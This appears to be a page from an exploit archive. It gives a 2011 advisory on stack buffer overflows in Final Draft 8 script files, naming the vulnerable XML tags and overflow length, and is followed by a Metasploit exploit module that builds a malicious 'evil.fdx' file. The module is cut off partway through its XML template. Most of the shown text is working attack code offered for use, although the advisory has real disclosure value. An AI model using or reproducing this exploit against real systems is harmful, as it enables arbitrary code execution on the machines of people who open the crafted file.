Final Draft 8 Multiple Stack Buffer Overflows

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Final Draft 8 Multiple Stack Buffer Overflows
# Published : 2011-12-01
# Author :
# Previous Title : SkinCrafter ActiveX Control version 3.0 Buffer Overflow
# Next Title : PHP 5.4 (5.4.3) Code Execution (Win32)

#Name : Final Draft 8 Multiple Stack Buffer Overflows 
#Vendor Website : http://www.finaldraft.com/index.php 
#Date Released : 29/11/2011 
#Affected Software : Final Draft < 8.02 
#Researcher : Nick Freeman (nick.freeman@security-assessment.com)

#Description
#Security-Assessment.com has discovered several file format vulnerabilities in .fdx and .fdxt files, as used by #the script writing software, Final Draft 8.
#The following XML tag elements were found to be vulnerable to buffer overflows, which can be exploited to #execute arbitrary code under the context of the user running Final Draft 8:
#<Word> in <IgnoredWords>
#  <Transition> in <SmartType>
#  <Location> in <SmartType>
#  <Extension> in <SmartType>
#  <SceneIntro> in <SmartType>
#  <TimeOfDay> in <SmartType>
#  <Character> in <SmartType>
#By crafting a file that contains more than 10,032 characters in one of the above fields, the Final Draft 8 #application will crash as a result of a buffer overflow overwriting the SEH (Structured Exception Handler).

#Solution
#The latest version of Final Draft (version 8.02) remediates this vulnerability. This can be downloaded from #the Final Draft website.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Final Draft 8 File Format Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in Final Draft 8. Multiple
					fields are vulnerable to the overflow, however <Word> in <IgnoredWords> is
					the only field to accept mixed-case characters.
			},
			'License'        => MSF_LICENSE,
			'Author' 	     => [ 'vt [nick.freeman@security-assessment.com]' ],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'URL', 'http://security-assessment.com/files/documents/advisory/Final_Draft-Multiple_Stack_Buffer_Overflows.pdf' ]
				],
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "x00",
					'DisableNops'    => true,
					'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
					'EncoderOptions' =>
						{
							'BufferRegister' => 'EAX',
						}
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Default',
						{
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Nov 29 2011',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'evil.fdx']),
			], self.class)
	end

	def exploit

		template = %Q|<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<FinalDraft DocumentType="Script" Template="No" Version="1">
<Content>
<Paragraph Type="Show/Ep. Title">
<Text>a